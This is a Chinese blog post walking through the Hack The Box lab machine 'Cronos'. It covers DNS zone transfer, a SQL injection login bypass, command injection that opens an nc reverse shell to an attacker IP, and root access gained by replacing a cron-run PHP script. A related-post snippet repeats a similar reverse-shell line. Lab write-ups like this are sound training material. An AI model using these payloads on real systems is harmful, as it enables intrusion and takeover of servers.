【Hack The Box】linux练习-- Cronos

最新推荐文章于 2024-09-14 19:00:09 发布
最新推荐文章于 2024-09-14 19:00:09 发布
阅读量208 收藏
点赞数
分类专栏: Hack The Box 文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127762461
版权

HTB 学习笔记

【Hack The Box】linux练习-- Cronos

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月9日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18b973826f26c7788f1b3988d802cee8 (RSA)
|   256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_  256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

dns枚举

dns枚举方法主要有以下几点

dnsrecon -r 10.10.10.0/24 -n 10.10.10.13

得到第一个解析域名
在这里插入图片描述添加入hosts
在这里插入图片描述

两种任选一个
host -l -a cronos.htb 10.129.227.211 
dig axfr cronos.htb @10.129.227.211

在这里插入图片描述得到更多信息
继续加入hosts

在这里插入图片描述

web

三个域名都看看,只有admin开头的有用
弱口令无效
尝试sql
在这里插入图片描述

admin' or '1'='1 #

发现可以
带一个引号可以执行命令

在这里插入图片描述找一个反弹shell的命令,用啥都行

;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.63 8080 >/tmp/f
python -c 'import pty; pty.spawn("/bin/bash")'
然后拿一个伪shell

在这里插入图片描述
在这里插入图片描述接着穿一个linpeas.sh
发现飘橘的计划任务

在这里插入图片描述

          •   root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

la -la查看一下我们能不能写
在这里插入图片描述把原来的文件改个名,传个php脚本改成计划任务的名字即可
拿到root
在这里插入图片描述

人间体佐菲
关注
专栏目录
hackthebox-cronos(考点:dns/sql注入/crontab)
冬萍子癸水
04-11 370
nmap 看到53端口就应该想到dns,在/etc/hosts/里加上10.10.10.13 cronos.htb 然后再打开80,进入 cronos.htb。看看网页。以及dirbuster扫,但都没什么有价值的信息。 没啥突破口啊。继续信息搜集。 看来针对端口53,还要再利用 dig axfr @10.10.10.13 cronos.htb host -l cronos.htb 10.10...
HackTheBoxCronos笔记
X
04-19 1283
HackTheBoxCronos笔记 HackTheBoxCronos WalkthroughHackTheBoxCronos笔记信息收集NMAP53端口:获得域名80端口:Laravel -> DNS Zone Transfer -> Admin域传送漏洞digNmapnslookup反弹shell提权定时任务反思与总结reference 信息收集 NMAP # nmap...
Ubuntu 16.04.7 server升级Openssh版本到8.8
wxqndm的博客
11-18 1140
Ubuntu OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515)Ubuntu OpenSSH 安全限制绕过漏洞(CVE-2016-10012)Ubuntu OpenSSH 多个拒绝服务漏洞(CVE-2016-10708)Ubuntu OpenSSH 远程代码执行漏洞(CVE-2016-10009)Ubuntu OpenSSH 远程权限提升漏洞(CVE-2016-10010)Ubuntu OpenSSH 用户枚举漏洞(CVE-2016-6210)
HackTheBox | Cronos
Purpose_7的博客
03-17 213
HackTheBox | Cornos
Cronos -- hack the box
neal1991的专栏
03-15 361
IntroductionTarget machine: 10.10.10.13(OS: linux)Kali linux: 10.10.16.44EnumerationF...
Hack the box靶机 cronos
菜浪马废的博客
05-19 406
添加10.10.10.13 cronos.htb 到/etc/hosts 同样添加到/etc/hosts 访问一下 直接绕过了 一看就是远程命令执行 抓包 确认完毕 上nc 10.10.14.8 && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.118 1234 >/tmp/f root用户在运行artisan 写个PHP脚本 替换它 然后连接 我用的php-rever.
HackTheBox-Machines--Cronos
七天
05-27 468
Cronos 测试过程。
cron-expression-input:Cron UI:输入组件,可轻松直观地生成cron表达式
02-04
import "cron-expression-input/lib/cron-expression-input.min.css" ; /* CSS */ require ( "cron-expression-input" ) ; /* JAVASCRIPT */ CDN 将CDN添加到您的项目 < link rel =" stylesheet " hr
.NET-Quartz-Cron-Parser:Quartz Cron 表达式转换为中文自然语言的查询工具, 使用C#作为语言开发
07-13
.NET-Quartz-Cron-Parser 是一个专门为 .NET 平台设计的工具,它能够将 Quartz Cron 表达式转化为中文自然语言,使得对于复杂的定时任务调度更容易理解和管理。Quartz 是一个开源的作业调度框架,广泛应用于Java和...
vue-cron_vue-cron_vuecrond组件_vuecron_
10-04
Vue-Cron是一款基于Vue.js开发的时间周期(Cron)表达式组件,用于在前端应用程序中创建、编辑和处理定时任务。Vue-Cron旨在提供一种直观的用户界面,让用户能够通过图形化的方式设置复杂的Cron表达式,从而实现定时...
cron-parser:Cron表达式的Java解析器
05-03
cron解析器 一个将cron表达式转换为人类可读字符串的Java库。 从转换为Java。 原始作者和信誉:Brady Holt( )许可证:麻省理工学院 ...提供了cron-parser,请从那里选择最新版本。 使用示例(单元测试) 参见
vixie-cron-4.1.rar_centos-s002_crontab source code_vixie-cron_vi
07-15
《vixie-cron-4.1:CentOS下的crontab定时任务源代码解析》 在Linux系统中,crontab是用于设置周期性被执行的任务的工具,它源自著名的Unix系统工具cron。Vixie-croncron的一个实现版本,由Paul Vixie开发,广泛...
HackTheBox - Cronos Write Up
ak.Gh0st的博客
04-03 233
HackTheBox - Cronos Write Up
No.97-HackTheBox-Linux-Cronos-Walkthrough渗透学习
qq_34801745的博客
05-14 328
** HackTheBox-Linux-Cronos-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/11 靶机难度:中级(4.5/10) 靶机发布日期:2017年10月13日 靶机描述: CronOS focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world
Hackthebox------Jerry
大方子
11-24 3061
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
靶机渗透练习26-Funbox5-Next Level
hirak0的博客
04-18 980
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-next-level,547/ Description Lets separate the script-kids from script-teenies. Hint: The first impression is not always the right one! If you need hints, call me on twitter: @0815R2d2 Have fun… This works bet
LINUX】SHELL贪吃蛇
09-11 465
Show()#Mapdo;;;esacdone#Snakefor ((i=0;i++))doecho "*"done#Foodecho "0"dodoneMove();;;;esacArrayMovethenthenthenthenfithen。
navicate远程linux上的pgsql提示密码失败
最新发布
记录、分享、合作、共赢
09-14 226
2、postgresql.conf文件中,修改listen_addresses。3、重启pgsql,例如:systemctl restart pgsql。1、pg_hba.conf文件中,ipv4下面的内容改成。4、如果问题还在,检查firewalld防火墙,执行。5、再次尝试连接,成功!
GDB的基本使用方法(之二)
相忘于江湖的专栏
09-14 535
要调试守护进程(daemon process)等已经启动的进程,或是调试陷入死循环而无法返回控制台的进程时,可以使用attach命令,形式是: (gdb) attach PID attach之后就能使用普通的gdb命令,因此可以通过print显示变量,也可以设置断点。 此外,回复程序运行一般可以使用continue命令。 确认了行为之后,需要在gdb和进程分离时使用detach命令: (gdb) detach
xxl-job 的cron表达式
08-02
xxl-job的cron表达式是用来定义任务调度的时间规则的。它由6个字段组成,分别表示秒、分、小时、日期、月份和星期。每个字段都有特定的取值范围和符号表示。例如,秒的取值范围是0-59,可以使用逗号分隔的列表、连...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值